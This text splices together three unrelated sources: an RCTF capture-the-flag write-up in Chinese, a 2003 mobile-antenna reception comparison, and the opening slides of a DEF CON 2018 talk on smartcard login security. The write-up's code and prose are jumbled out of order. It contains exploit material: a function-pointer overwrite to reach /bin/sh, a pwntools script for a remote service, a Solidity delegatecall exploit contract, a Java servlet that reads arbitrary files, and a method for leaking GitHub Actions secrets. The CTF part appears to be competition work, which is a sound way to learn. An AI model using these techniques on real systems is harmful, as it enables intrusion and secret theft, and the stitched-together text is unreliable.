[14, 10, 5, 13, 3, 7, 3],
[5, 2, 11, 7, 4, 14, 3],
[8, 8, 12, 7, 2, 11, 6],
[2, 5, 10, 3, 2, 9, 8],
]
FINAL = [
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
]
for i in range(7):
for j in range(7):
for t in range(4):
if ((ORI[i][j] >> t) | (ORI[i][j] << (4 - t))) & 0xf == GOOD[i][j]:
FINAL[j][i] = t
for i in range(7):
print(FINAL[i])
ret = ''
retmask = ''
for i in range(7):
for j in range(7):
c = str((FINAL[i][j]) % 4)
ret += c
if ORI[j][i] in (5, 10):
retmask += 'X'
else:
retmask += c
Final Brute-force:
Final Flag: RCTF{3330103311331013023313123131201201323021202330110}
LoongArch
关键就⼏条指令,clo.d检测寄存器bit 1的个数是不是64,从栈中取出的⽐较数据和加密后的数据异或之后是等于
0xffffffffffffffff,然后就先逆bitrev.8b指令,bytepick.d指令,bitrev.d指令,最后逆和key进⾏异或的xor指令
print(ret)
print(retmask)
from pwn import *
from itertools import product
ori = '3330303311331213023333123131221201323021202330110'
mar = '3330X03311X31X130X33X31231312X1201323021202X30110'
count = mar.count('X')
idxes = []
for i in range(49):
if mar[i] == 'X':
idxes.append(i)
new_cases = []
for each in product([2,0], repeat=count):
new_case = list(ori)
for i, idx in enumerate(idxes):
new_case[idx] = str( (int(new_case[idx]) + each[i]) % 4)
new_cases.append(''.join(new_case))
for each in new_cases:
p = process(['./re',each])
ret = p.recvall()
if 'oops' not in ret:
print(each)
print(ret)
exit(1)
# _*_ coding:utf-8 _*_
path = r"newLoongArch\output"
output = open(path, 'rb').read()
output = list(output)
cmp_data = output[32:] # 后⾯32字节是⽐较数据
key = output[:32] # 前32字节是key
key[:8] = key[:8][::-1] # 从栈中读数据,⼩端
key[8:16] = key[8:16][::-1]
key[16:24] = key[16:24][::-1]
key[24:] = key[24:][::-1]
cmp_data[:8] = cmp_data[:8][::-1]
cmp_data[8:16] = cmp_data[8:16][::-1]
cmp_data[16:24] = cmp_data[16:24][::-1]
cmp_data[24:] = cmp_data[24:][::-1]
key0 = 0x8205f3d105b3059d
key1 = 0xa89aceb3093349f3
key2 = 0xd53db5adbcabb984
key3 = 0x39cea0bfd9d2c2d4
for i in range(len(cmp_data)):
cmp_data[i] = cmp_data[i] ^ 0xff
def rev_bitrev(ch):
bin_string = "{:08b}".format(ch)
bin_string = bin_string[::-1]
ret = eval('0b' + bin_string)
return ret
def rev_bitrevd(data):
bin_string = "{:064b}".format(data)
return eval('0b' + bin_string[::-1])
def rev_bytepickd(t0, t1, t2, t3, sa3):
new_data = [0]*32
new_data[:sa3] = t1[8-sa3:]
new_data[sa3:8] = t2[:8-sa3]
new_data[8:8+sa3] = t2[8-sa3:]
new_data[sa3+8:16] = t0[:8-sa3]
new_data[16:16+sa3] = t0[8-sa3:]
new_data[16+sa3:24] = t3[:8-sa3]
new_data[24:24+sa3] = t3[8-sa3:]
new_data[24+sa3:] = t1[:8-sa3]
return new_data
# 逆向bitrev.8b
for i in range(32):
cmp_data[i] = rev_bitrev(cmp_data[i])
# print(hex(cmp_data[i]), end=', ')
# 逆向bytepick.d
t0 = cmp_data[:8]
t1 = cmp_data[8:16]
Valgrind
找到⼀个常数0x4ec4ec4f , ⽹上找到是模26
http://www.flounder.com/multiplicative_inverse.htm
数字和字⺟的加密⽅法不⼀样
t2 = cmp_data[16:24]
t3 = cmp_data[24:]
print(t0, t1, t2, t3)
cmp_data = rev_bytepickd(t0, t1, t2, t3, 3)
hex_string0 = ''
hex_string1 = ''
hex_string2 = ''
hex_string3 = ''
for i in range(8):
hex_string0 += '{:02x}'.format(cmp_data[i])
print(hex_string0)
for j in range(8, 16):
hex_string1 += '{:02x}'.format(cmp_data[j])
print(hex_string1)
for k in range(16, 24):
hex_string2 += '{:02x}'.format(cmp_data[k])
print(hex_string2)
for m in range(24, 32):
hex_string3 += '{:02x}'.format(cmp_data[m])
print(hex_string3)
real_hex_string = ''
last0 = rev_bitrevd(eval('0x' + hex_string0))
last1 = rev_bitrevd(eval('0x' + hex_string1))
last2 = rev_bitrevd(eval('0x' + hex_string2))
last3 = rev_bitrevd(eval('0x' + hex_string3))
real_hex_string += "{:08x}".format(last0)
real_hex_string += "{:08x}".format(last0)
real_hex_string += "{:08x}".format(last0)
real_hex_string += "{:08x}".format(last1)
import binascii
print(binascii.unhexlify(hex(key0 ^ last0)[2:]).decode(encoding="utf-8")[::-1], end='')
print(binascii.unhexlify(hex(key1 ^ last1)[2:]).decode(encoding="utf-8")[::-1], end='')
print(binascii.unhexlify(hex(key2 ^ last2)[2:]).decode(encoding="utf-8")[::-1], end='')
print(binascii.unhexlify(hex(key3 ^ last3)[2:]).decode(encoding="utf-8")[::-1])
Hi!Harmony!
UCB RISCV逆向
找strings,发现welcome,查xref定位主函数,是个奇怪加密,⼿动执⾏后得到输出
KDUPRQBGUHDPLWSRVVLEOH,包裹rctf即可
RCTF{KDUPRQBGUHDPLWSRVVLEOH}
dht
分布式散列表
rust多线程
a = 't1me_y0u_enj0y_wa5t1ng_wa5_not_wa5ted'
number= '0123456789'
table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for i in a:
if i not in number:
print(table[((ord(i)+3-90)%26)-1],end='')
else:
print(chr(ord(i)+3),end='')
__map={}
__map['110']=
['3e0','a71','332','852','1e2','cb3','b05','915','c25','f45','765','0a7','848','4a8','c
c8','fc8','b79','82a','adb','d5c','16e','34f']
__map['96']=
['9d0','772','492','ef3','654','775','4c5','987','5d7','0d8','81b','efb','53c','f3d','5
bd','0dd','5dd']
__map['118']=
['7f0','241','741','ba2','4f2','893','754','445','095','3b6','957','208','038','3b8','6
6a','26d','73f','66f','dff']
__map['141']=
['611','c93','644','774','6a4','e56','cc6','ec6','587','8a8','c99','a9b','daf','4bf','e
cf','def']
__map['127']=
['1d0','1e0','352','f52','795','d76','bb6','d47','3c7','748','658','fe8','f7b','bbb','3
6c','e8d','6de','3cf']
__map['149']=
['aa0','a53','704','114','d34','5f4','b06','c77','139','99a','fea','beb','28c','bec','2
7d','c6f','28f']
__map['145']=
['cd0','b82','c82','7d3','f15','046','b66','2c7','459','bc9','b5b','38c','2bc','8ec','a
3f','79f']
__map['150']=
['701','941','a41','551','af1','722','f43','c64','615','995','f86','196','5a7','ee7','1
7a','c2b','57b','9fb','f2c','a2d','31e','d9e','11f']
__map['146']=['e00','a50','744','b76','7ca','ffb','53e','ccf']
__map['194']=
['300','440','db0','a32','582','0b4','b35','a19','669','c89','d9b','ddb','92c','ddd','c
ed','03e','abe','d5f','36f','88f','bcf']
__map['207']=
['980','651','b72','4d2','556','ab8','07b','59b','65c','53d','e8e','afe','98f']
__map['197']=
['531','e41','1c1','b75','2a5','786','b77','bb7','bd7','b19','0ab','c7c','5ed','26e','2
8e','17f','59f','dbf']
__map['235']=
['2a0','761','7f2','184','905','126','9e7','c88','dc8','0d9','97a','9bb','22e','59e']
__map['25']=
['200','0d0','c81','9a1','f02','415','586','3c6','93b','87c','aec','23d','79d','bfd','c
0e','83e','f7f','4af','8ff']
number=[0x6E, 0x60, 0x76, 0x8D, 0x7F, 0x95, 0x91, 0x96, 0x92,
0xC2, 0xCF, 0xC5, 0xEB, 0x19] # ans去重
ans=[0x6E, 0x60, 0x76, 0x8D, 0x7F, 0x95, 0x91, 0x6E, 0x96, 0x92,
0xC2, 0xCF, 0xC5, 0xC5, 0xEB, 0x19]
alp="0123456789abcdef"
times = [0 for i in range(1000)]
for i in ans:
times[i] += 1
__invmap={}
ttt=[]
for i in number:
for j in __map[str(i)]:
ttt.append(j)
__invmap[j] = i
def dfs(dep , flag):
if dep == 16:
print(flag[:-2])
return
last = flag[-2:]
for i in alp:
_tmp_str = last + i
if _tmp_str in ttt:
if times[__invmap[_tmp_str]] != 0:
times[__invmap[_tmp_str]] -= 1
dfs(dep+1, flag + i)
times[__invmap[_tmp_str]] += 1
two_shortest
Pascal写的SGU OJ 185
最⼩费⽤最⼤流
建图⽤的邻接矩阵,没有检查下标,可以在bss段任意写
逆向得到函数sub_424960可以执⾏/bin/sh -c arg1
函数sub_417FE0是exit函数,调⽤了off_4E9730(unk_4E8340)
通过溢出改写off_4E9730为sub_424960
off_4E9730为函数指针,unk_4E8340为int
改写unk_4E8340为/bin/sh地址(⾮PIE情况下,地址32位空间即可容纳)
程序退出时即可获得shell
1 2
453 145 4367680
456 221 4344160
Crypto
Uncommon Factors I
for i in number:
for j in __map[str(i)]:
times[__invmap[j]] -= 1
dfs(1, j)
times[__invmap[j]] += 1
from Crypto.Util.number import bytes_to_long
from gmpy2 import mpz
import gmpy2
from tqdm import tqdm
with open("lN.bin","rb") as f:
data = f.read()
n = []
for i in tqdm(range(2**22)):
n.append(mpz(bytes_to_long(data[64*i:64*i+64])))
for i in tqdm(range(19)):
new_n = []
for j in range(len(n)//2):
new_n.append(mpz(n[2*j]*n[2*j+1]))
Uncommon Factors II
n = new_n
for i in range(len(n)):
for j in range(i+1,len(n)):
print(i,j,gmpy2.gcd(n[i],n[j]))
from Crypto.Util.number import bytes_to_long
with open("lN2.bin","rb") as f:
data = f.read()
N = []
for i in range(128):
N.append(bytes_to_long(data[64*i:64*i+64]))
from itertools import permutations
P_bits = 312
Q_bits = 200
R_bits = 304
X = 2**R_bits
m = len(N)
PR = PolynomialRing(ZZ, names=[str('x%d' % i) for i in range(1, 1 + m)])
h = 3
u = 1
variables = PR.gens()
gg = []
monomials = [variables[0]**0]
for i in range(m):
gg.append(N[i] - variables[i])
monomials.append(variables[i])
print(len(monomials), len(gg))
print('monomials:', monomials)
B = Matrix(ZZ, len(gg), len(monomials))
for ii in range(len(gg)):
for jj in range(len(monomials)):
if monomials[jj] in gg[ii].monomials():
B[ii, jj] = gg[ii].monomial_coefficient(monomials[jj]) * monomials[jj]([X]
* m)
BlockChain
EasyFJump
bytecode 逆向结果:
B = B.LLL()
print('-' * 32)
new_pol = []
for i in range(len(gg)):
tmp_pol = 0
for j in range(len(monomials)):
tmp_pol += monomials[j](variables) * B[i, j] / monomials[j]([X] * m)
new_pol.append(tmp_pol)
if len(new_pol) > 0:
Ideal = ideal(new_pol[:m-1])
GB = Ideal.groebner_basis()
function_variables = var([str('y%d' % i) for i in range(1, 1 + m)])
res = solve([pol(function_variables) for pol in GB], function_variables)
print('got %d basis' % len(GB))
print('solved result:')
print(res)
for tmp_res in res:
PRRR.< x, y> = PolynomialRing(QQ)
q = abs(PRRR(res[0][0](x, y)).coefficients()[0].denominator())
p = N[-1] // q
print(p)
contract translate{
bytes32 a;
bytes32 b;
bytes32 c;
bytes32 d;
function _0b21d525(bytes memory x) public{
a = msg.data[0x04:0x24];
b = msg.data[0x24:0x44];
c = msg.data[0x44:0x64];
}
function _89068995() public{
bytes32 i = 0x0335;
d1 = func_02F8() == 0x01f06512dec2c2c6e8ab35
d2 = func_02F8() == 0x02b262ac4c65fddc17c7d5
d3 = func_02F8() == 0x02125ed5d7ddf56b0eba28
d4 = func_02F8() == 0x018fbbc52638a0f3d00fee
HackChain
部分逆向:
bytes32 i = 0x00d8;
var3 = (a - b - c) & 0xffff;
target = 0x00d8 +msg.value - var3 == 0x01B;
}
function func_02F8() private{
var var0 = 0x00;
var var1 = c;
var var2 = d * a + b;
require(c!=0);
d = (d * a + b) %c;
return d;
}
}
from math import gcd
from Crypto.Util.number import inverse
from functools import reduce
data =
[0x0259c30dc979a94f999,0x01f06512dec2c2c6e8ab35,0x02b262ac4c65fddc17c7d5,0x02125ed5d7dd
f56b0eba28,0x018fbbc52638a0f3d00fee]
delta = [d1 - d0 for (d0, d1) in zip(data, data[1:])]
m_mul = [d0 * d2 - d1 * d1 for (d0, d1, d2) in zip(delta, delta[1:], delta[2:])]
m = reduce(gcd, m_mul)
a = delta[1]*inverse(delta[0],m)%m
b = (data[1]-data[0]*a)%m
print(a, b, m)
contract Contract{
event ForFlag(address addr);
struct Func {
function() internal f;
}
function execure(address addr){
require(address(this).balance == addr&0x0fff); //0xea8结尾
(bool success, bytes memory ??) = addr.delegatecall(
构造合约1:
构造合约2:
abi.encodeWithSignature("execure(address)", addr?)
);
require(!success));
require(data[:4] == keccak256(0x676574666c61672875696e7432353629)[:4]);
assembly {
mstore(func, sub(add(mload(func), data[4:]), address(this).balance))
} // 0x4c3
func.f(); // => 0x3c6
}
}
contract exp{
fallback(bytes calldata) external returns(bytes memory a){
assembly{
mstore8(0,0xdd)
mstore8(1,0xdc)
mstore8(2,0x5b)
mstore8(3,0xbf)
mstore(4,0xc8f)
revert(0,0x24)
}
}
}
bytes contractBytecode =
hex"6080604052348015600f57600080fd5b50606b80601d6000396000f3fe6080604052348015600f57600
080fd5b50600036606060dd60005360dc600153605b60025360bf600353610c8f60045260246000fdfea264
69706673582212204fb9a4d0ca8ea1d456a492ddd96c0fba225975532a908355f8e9f8f1b97dfcf364736f6
c63430008000033";
function deploy(bytes32 salt) public{
bytes memory bytecode = contractBytecode;
address addr;
调⽤tx,deploy合约3(0xbfe391bac53c9df7696aedc915f75ca451f66bad)
最后exercise
0xbfe391bac53c9df7696aedc915f75ca451f66bad
Misc
ezshell
assembly {
addr := create2(0, add(bytecode, 0x20), mload(bytecode), salt)
}
}
}
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.*;
public class test123 {
public void e(Object request, Object response){
HttpServletRequest httpServletRequest=(HttpServletRequest)request;
HttpServletResponse httpServletResponse=(HttpServletResponse)response;
File file = new File(httpServletRequest.getParameter("file"));
InputStream in = null;
try{
in = new FileInputStream(file);
int tempbyte;
while ((tempbyte = in.read()) != -1) {
httpServletResponse.getWriter().write(tempbyte);
}
}catch (Exception e){
}
}
}
monopoly
玩⼤富翁,困难模式玩赢给Flag
玩完困难模式之后玩家信息不清空,可以进⾏SL⼤法
每次可以重载⼀个随机种⼦,并且AI⼀定⽐玩家后⾏动,然后玩家会再⾛⼀步,然后选择不玩了的话下⼀次⼜是玩
家⾛
每次重载了之后钱、位置不清空,但是资产信息清空了,所以只能⽤机会格⼦去赚钱,机会格⼦roll的点也是rand
⽣成的,所以也可以预测,每次都想办法让它去翻2倍就⾏了
from pwn import *
import ctypes
# context.log_level = 'DEBUG'
cdll = ctypes.CDLL('./libc-2.27.so')
p = remote('123.60.25.24', 20031)
p.recvuntil('what\\'s your name?')
p.sendline('acdxvfsvd')
money = 0
ai_money = 0
pos = 0
ai_pos = 0
types = [1] * 64
types[0] = 0
types[16] = 2
types[32] = 2
types[48] = 2
types[11] = 2
types[19] = 2
types[26] = 2
types[37] = 2
types[56] = 2
types[3] = 3
types[22] = 3
types[40] = 3
types[51] = 3
def new_game(seed):
p.recvuntil('3. hard level!!!!')
p.recvuntil('input your choice>>')
p.sendline('3')
p.recvuntil('you choice hard level, you can choice a seed to help you win the
game!')
p.sendline(str(seed))
def player_turn():
global pos, ai_pos
p.recvuntil('your money: ')
money = int(p.recvline().strip())
p.recvuntil('acdxvfsvd throw')
val = int(p.recvuntil(',')[:-1])
p.recvuntil('now location:')
pos = int(p.recvuntil(',')[:-1])
log.info("player money {}, throw {}, pos {}".format(money, val, pos))
p.recvline()
if pos == 0:
return '0'
nex = p.recvline()
if ('free parking' in nex):
owner = 'free'
elif 'owner' in nex:
owner = nex[nex.index(':')+1:].strip()
elif ('chance' in nex):
owner = 'chance'
else:
print nex
log.info('owner {}'.format(owner))
return owner
def ai_turn():
global ai_pos
p.recvuntil('ai money: ')
ai_money = int(p.recvline().strip())
p.recvuntil('AI throw')
val = int(p.recvuntil(',')[:-1])
p.recvuntil('now location:')
ai_pos = int(p.recvuntil(',')[:-1])
log.info("ai money {}, throw {}, pos {}".format(ai_money, val, ai_pos))
p.recvline()
if (ai_pos == 0):
return '0'
nex = p.recvline()
if ('free parking' in nex):
owner = 'free'
elif 'owner' in nex:
owner = nex[nex.index(':')+1:].strip()
elif ('chance' in nex):
owner = 'chance'
else:
print nex
log.info("owner {}".format(owner))
return owner
def calculate_seed():
flag = 0
for i in range(1, 13):
if (types[(i + pos) % 64] == 3):
flag = 1
elif (flag == 0 and types[(i + pos) % 64] == 2 or types[(i + pos) % 64] == 0):
flag = 2
print('flag', flag)
for seed in range(1, 100000000):
cdll.srand(seed)
if (flag == 1):
r1 = (cdll.rand() & 0xff) % 0xc + 1
next_pos = (pos + r1) % 64
if (types[next_pos] != 3):
continue
chance = cdll.rand() & 0xff
# print(hex(chance))
if (chance <= 0xef):
continue
# return seed
# elif (flag == 2):
# r1 = (cdll.rand() & 0xff) % 0xc + 1
# next_pos = (pos + r1) % 64
# if (types[next_pos] != 0 and types[next_pos] != 2):
# continue
# return seed
else:
r1 = (cdll.rand() & 0xff) % 0xc + 1
next_pos = (pos + r1) % 64
# if (types[next_pos] == 2):
# chance = cdll.rand() & 0xff
# if (chance <= 0x9f):
# continue
r2 = (cdll.rand() & 0xff) % 0xc + 1
ai_next_pos = (ai_pos + r2) % 64
checkin
github actions题,需要泄漏secret
github actions log特性,会匹配secret改成星号,issue中输⼊00000 - 99999所有数字,看actions的构建⽇志,
被打星号的就是secret
coolcat
每个像素⽬标位置为⼆元递推式,考虑构造矩阵
mat1=[ x y ],mat2=[ 1 p ]
[ q p+q]
if (types[ai_next_pos] == 2):
chance = cdll.rand() & 0xff
r3 = (cdll.rand() & 0xff) % 0xc + 1
print(pos, r1, ai_pos, r2)
n_next_pos = (pos + r1 + r3) % 64
# if (types[n_next_pos] not in [2,0,1]):
if (types[n_next_pos] == 1):
log.info('Stage 1 Seed {}'.format(seed))
return seed, types[n_next_pos]
new_game(17)
for i in range(4):
print(i)
x = player_turn()
if (x == 'nobody'):
p.sendline('2')
elif (x == 'acdxvfsvd'):
p.sendline('2')
a = ai_turn()
x = player_turn()
while (x in ['free', '0', 'chance']):
a = ai_turn()
x = player_turn()
p.sendline('4')
seed, new_type = calculate_seed()
new_game(seed)
print types
# iter 5 val 54
p.sendline('4')
p.sendline('3')
p.sendline('54')
p.interactive()
则有destpos=mat1*mat2**m,其中p,q,m为密钥
容易构造特殊的mat1,直接得出(mat2**m)%600
根据矩阵乘法结合律可解出所有像素的对应位置
(mat2**m)%600=
解密脚本
RCTF{RCTFNB666MyBaby}
welcome_to_rctf
签到
FeedBack
签退
(409 336)
(336 433)
k=cv2.imread("enced.jpg")
o=np.zeros((600,600,3),'uint8')
for i in range(600):
for j in range(600):
o[i][j]=k[(i*409+j*336)%600][(i*336+j*433)%600]
print(o)
cv2.imwrite("out.jpg",o) | pdf |
Antenna comparison
20 antennas were tested to see which ones were the best for receiving.
All the antennas are 3/4" Motorola TAD/TAE mount (aka "NMO").
The following lists are ordered as per what you see in the picture (left to right).
General information:
Manufacturer Model Type Freq rating/gain
------------------- ------------------ ---------------------------------------------- -------------------------
Larsen NMO-27 (new style) 1/4 wave base loaded 27-28/0dB
Radiall/Larsen NMO-27B 1/4 wave base loaded 27-28/0dB
Larsen NMO-30B 1/4 wave base loaded 30-40/0dB
Larsen NMO-50C 1/4 wave base loaded 47-54/0dB
Larsen NMO-2/70 (old sytle) loaded 1/2 (VHF), closed coil collinear (UHF) 144-
148/6dB 440-450/3.5dB
Larsen NMO-150 (new sytle) 5/8 wave base loaded 144-148/3dB
Larsen NMO-Q 1/4 wave 150-170/0dB
Larsen NMO-Q 1/4 wave 95-105/0dB
Antenna Specialists ASPRD1615 1/4 wave 430-470/0dB
Maxrad BMUF9000 1/4 wave 896-940/0dB
Larsen NMO-450 5/8 over 1/2 wave closed coil collinear 450-470/3.4dB
Motorola TDE6082A (?) closed coil collinear 460-470/5dB
Larsen NMO-UHF 5/8 over 1/4 wave open coil collinear 450-470/3.2dB
Maxrad BMUF8125 1/2 over 1/2 over 1/4 wave open coil trilinear 806-866/5dB
Maxrad BMUF9043 1/2 over 1/4 wave open coil collinear elevated 896-
940/3dB
Larsen NMO-800 5/8 over 1/2 wave closed coil collinear 806-866/3.4dB
Maxrad unknown 5/8 over 1/2 wave open coil collinear 806-866/3.4dB
Larsen NMO3E825B 5/8 over 1/4 wave closed coil collinear 825-896/3.2dB
Larsen NMO5E825B 5/8 over 5/8 over 1/4 wave closed coil trilinear 825-896/5dB
Maxrad BMAXSCAN1000 double 1/2 over 1/4 closed coil collinear (800)
VHF/UHF/800
Performance:
Model LW AM SW CB VHF-Lo FM Air VHF-150 VHF-165 VHF-TV 220 MilAir UHF-Lo
UHF-Hi UHF-TV 800 900
-------------------- -- -- -- -- ------ -- --- ------- ------- ------ --- ------ ------ ------ ------ --- ---
NMO-27 (new style) 2 5 5 7 2 2 - - - 2 1 - 2 - 2 6 4
NMO-27B - 1 4 7 5 4 4 2 3 4 4 1 2 1 5 4 4
NMO-30B - 1 4 7 5 4 2 1 2 4 5 - 2 1 5 1 3
NMO-50C - 1 2 2 7 5 3 7 6 5 3 - 1 - 3 2 4
NMO-2/70 (old sytle) - - 1 - 2 4 3 6 7 6 5 2 8 8 5 3 4
NMO-150 (new sytle) 2 6 5 4 5 5 4 7 5 5 5 - 2 2 1 1 1
NMO-Q (150-170) 1 4 3 2 2 4 5 4 8 6 5 3 5 4 5 4 4
NMO-Q (95-105) 1 5 5 2 4 6 5 3 5 5 2 1 4 2 5 3 5
ASPRD1615 - 2 3 - 1 3 1 1 2 4 2 1 7 6 4 5 5
BMUF9000 - 1 1 - 1 1 - 1 1 3 1 - 1 1 4 7 6
NMO-450 2 5 5 3 4 6 5 2 6 5 2 2 6 5 4 5 6
TDE6082A (?) 2 6 5 3 5 6 4 2 4 5 5 1 5 4 3 2 5
NMO-UHF 2 5 5 2 4 6 4 2 5 5 2 1 6 5 4 5 6
BMUF8125 - 6 5 2 5 6 5 3 5 5 5 1 2 - 4 6 7
BMUF9043 1 7 5 3 2 5 6 5 6 6 5 2 2 1 5 7 7
NMO-800 1 6 5 4 3 5 5 4 8 6 6 3 4 3 6 8 8
Maxrad (800) - 3 2 3 2 5 4 3 6 6 5 1 2 2 5 6 4
NMO3E825B - 5 5 2 1 5 3 2 6 6 5 2 3 2 6 6 4
NMO5E825B 1 6 5 3 3 6 5 3 5 5 2 2 1 1 3 6 4
BMAXSCAN1000 - 3 5 2 2 5 5 4 6 6 5 1 7 6 6 4 5
- = Absolutely no reception
1 = Extremely bad reception, you might barely receive some very strong stations.
2 = Bad reception, strong stations come in very weak but can be heard.
3 = Limited range reception, stations come in about 1/4 - 1/2 the strength compared to an
average antenna for this band.
4 = Below average reception, stations come in about 3/4 the strength compared to an average
antenna for this band.
5 = Average reception. Stations come in at reasonable levels.
6 = Slightly above average reception, perhaps 1/2 to 1 S-Unit above an average antenna.
7 = Above average reception, perhaps 1 to 1.5 S-Units above an average antenna.
8 = Great reception, perhaps 2 S-Units above an average antenna.
9 = Too good to be true.
All tests were done with an AOR-3000 receiver.
Minimum of 5 measurements per band from fixed stations at varying distances and power levels.
Comments:
Yes, I know the NMO-30B has the wrong whip in the picture. I tested it with the correct whip.
The MilAir readings are somewhat pessimistic since all I had were a handful of
weak stations to test against. It wouldn't be unreasonable to knock the numbers
up a few notches to estimate how it would perform in general operation.
The lower-frequency base-loaded antennas tend to block out VHF/UHF, most likely
because of impedance issues where the coax couples to the loading coil. Its
interesting to note how the 3rd-generation Larsen NMO-27B has partial VHF reception
while the 2nd-generation NMO-27 does not. My guess is that Larsen made an engineering
change to accomodate CB radios like the Cobra-29WX which include a VHF weather-band
receiver. Another interesting thing to note is the 800mhz reception. While I certainly
wouldn't count on a low-band antenna for 800mhz, whats likely happening is the loading
coil itself is acting as the receiving antenna given the short wavelength of the signal.
The Larsen dual-bander (NMO-2/70) is totally deaf below VHF. Probably another loading
coil impedance issue since it will have a base-load to correctly match the half-wave
VHF radiator.
The Larsen NMO-150 works great for VHF, shortwave and AM but chokes on UHF and 800.
The quarter-waves and other antennas lacking a base-load (800mhz collinears, etc) all
seem to work great at lower frequencies, since there are no impedance issues with
loading coil coupling. Likewise the lower freqs see it as a chunk of wire, minus some
miscellaneous impedances when it hits the coils on the antenna rod. The only exceptions
to this rule are the UHF and 800/900mhz quarter-waves where the antenna is physically
too short to have any receive efficiency on the lower frequencies.
As per the above note, the open-coil Larsen NMO-UHF turned out to be a real
winner. While slightly less performing on 800/900 since its not designed for
it, this would be a great selection for an "all-band" antenna to connect to
a wideband receiver like an AOR or a Yupiteru.
Now for the curve-ball. Look at the Larsen NMO-800. Given its short size I kind
of scratched my head at the lower-frequency performance, but the tests don't lie.
Nonetheless I probably wouldn't count on it compared to the much longer NMO-UHF
for broadband reception, but if very small size was a requirement this would definitely
be my second choice for a compact antenna. Notice the performance difference compared
to the Maxrad 800 which is of identical size and electrical design, with the only
difference being an open coil compared to a closed coil. Even the most minor differences
can make a large impact on performance.
So.. my first choice for a compact antenna would be the Maxrad BMAXSCAN1000, since
it has much better UHF performance than the NMO-800, and reasonable performance
on the other bands.
I had hoped to see the Maxrad elevated 800mhz trilinear be the winner since it
had the combination of long physical length, high 800mhz gain, and no base-load,
however it ended up being so-so on VHF and pretty crappy on UHF. Still not bad in
the overall scheme of things.
The big Motorola 5db UHF did surprisingly well on the lower bands, but the
thing is just too damn ugly to put on my car.
The Larsen 3E825 was one of their Nextel OEM's. The 5E825 was on a Larsen "Special"
base. The 5E825 was pretty awesome when it came to broadband operation, except it
was somewhat deaf on UHF which was sort of a party-pooper.
Now its brand-preference opinion time !!
First, always use NMO mounts. They are THE standard and give you the most
options for swapping antennas around on your car. You can also use them
for base antennas, just use a mobile L-bracket and screw it onto your mast
or whatever. Get some copper rod at the hardware store and attach 3 or 4 ground
radials to the mast (unless receiving only 800/900mhz with an antenna
designed not to require a ground).
Larsen and Maxrad are the way to go. On some models you can save a few bucks
and still retain quality with the Maxrad.
Don't use mag-mounts unless you really have to. I don't care what the manufacturer
says, they will scratch your paint. Not to mention they don't ground as good as
other mounting arrangements.
Drilling holes in your roof is the best way to go (performance-wise), but personally
I don't like turning my cars into Swiss-cheese. Go with L-Brackets on the hood
or rear deck, as it takes two minor side-drilled holes that won't be an issue
when you sell your car. Edge-mounting antennas like this will give a ground only
halfway around the base of the antenna which can make for less-than-optimal radiation
patterns, although I certainly haven't noticed any problems worth crying over.
Another great mount is the trunk-lip bracket. The Larsen ones are ugly and expensive.
Get the Maxrad. These require no holes and work great. Sometimes you need to do
minor antenna re-tuning on lower-frequency antennas since part of the radiated
signal will bounce off the metal on the roof of the car. Again, not a perfect
radiation pattern but certainly usable.
If you plan on receiving 800/900mhz using an NMO mount, check any cable that
you got with your antenna or bracket and see if its standard RG-58. If so, chuck
it and get an 800/900mhz NMO mounting kit that has RG-58 double-shield or better
cable (Cushcraft Ultralink for example). Despite the loss-per-hundred-feet ratings
on RG-58, you can suffer noticeable losses if you use it on short mobile cable runs.
Remember to pick up the twist-on "rain caps" for your antenna mounts and drop them
in your glove box. They cost like $1.50 each and come in handy if you need to stash
your antennas in the trunk when you park your car downtown, at long-term airport
parking, or in one of the less friendly neighborhoods.
Glass mounts suck for a variety of reasons. Single-band receive on 800mhz is about
the only worthwhile use for these terrible things. Make sure you don't have aftermarket
window tint and make sure your glass doesn't have carbon-impregnated tint. Best way
to tell is to look at the glass from an angle under bright sunlight with polarized
sunglasses and look for oval "splotches" in the glass. If you have this kind
of glass, the best way to get around it is to use a service monitor with on-glass
coupling boxes connected to the tracking generator and spectrum analyzer, then
hunt across the glass until you find a hot-spot that passes the signal good.
2-19-2003 Rich W7KI | pdf |
Eric Sesterhenn <[email protected]>
2018
X41 D-SEC GmbH
https://www.x41-dsec.de/
1 / 30
whoami
• Eric Sesterhenn
• Principal Security Consultant
• Pentesting/Code Auditing at X41
https://www.x41-dsec.de/
2 / 30
Disclaimer
• The issues presented here have been
reported and fixed!
• These are open source projects - help them!
• I am not interested in testing / debugging
proprietary stuff in my spare time.
DEF CON 2018
3 / 30
Targets
LINUX
LOGIN
DEF CON 2018
4 / 30
Why?
• Smartcards control authentication!
• Authentication runs as root!
• Users and programmers
subconsciously trust the smartcard!
DEF CON 2018
5 / 30
Smartcards
User
Smartcard
Reader
Reader Driver
(PC/SC)
Login
(pam)
Smartcard Driver
(OpenSC)
DEF CON 2018
6 / 30
What is a Smartcard?
• Physical, tamper-proof device
• Designed to keep information secret
• Contains memory and a processor
https://en.wikipedia.org/wiki/Smart_card#/media/File:SmartCardPinout.svg
DEF CON 2018
7 / 30
Application Protocol Data Unit
• APDUs form the protocol to talk to
smartcards
• ISO/IEC 7816-4 Identification cards
- Integrated circuit cards
• T=0 is character oriented / T=1 is
block-oriented
• Verify: 00 20 00 01 04 31323334
CLA
INS
P1
P2
LC
Data
1
1
1
1
0-3
NC
DEF CON 2018
8 / 30
PC/SC API
• PC/SC API can be used on win and
*nix
• Other libraries have a similar
interface
LONG WINAPI SCardTransmit(
SCARDHANDLE
hCard,
LPCSCARD_IO_REQUEST pioSendPci,
LPCBYTE
pbSendBuffer,
DWORD
cbSendLength,
PSCARD_IO_REQUEST
pioRecvPci,
LPBYTE
pbRecvBuffer,
LPDWORD
pcbRecvLength
);
DEF CON 2018
9 / 30
PKCS11
• PKCS11 is a platform independent
API for cryptographic token
• Supported by OpenSSL, browsers,...
(eg. via libp11)
• Windows uses smartcard Minidriver
now
• Driver for each card, uses ATR to
match
CK_RV C_FindObjectsInit(
CK_SESSION_HANDLE hSession,
CK_ATTRIBUTE_PTR pTemplate,
CK_ULONG ulCount
);
DEF CON 2018
10 / 30
Smartcard Stack Summary
Application (pam)
PKCS11
PC/SC
APDU
Physical Card
DEF CON 2018
11 / 30
Smartcard for Sign-On
PAM
Smartcard
CRLServer
GetCerticates
Certicate
Validate Certicate and User
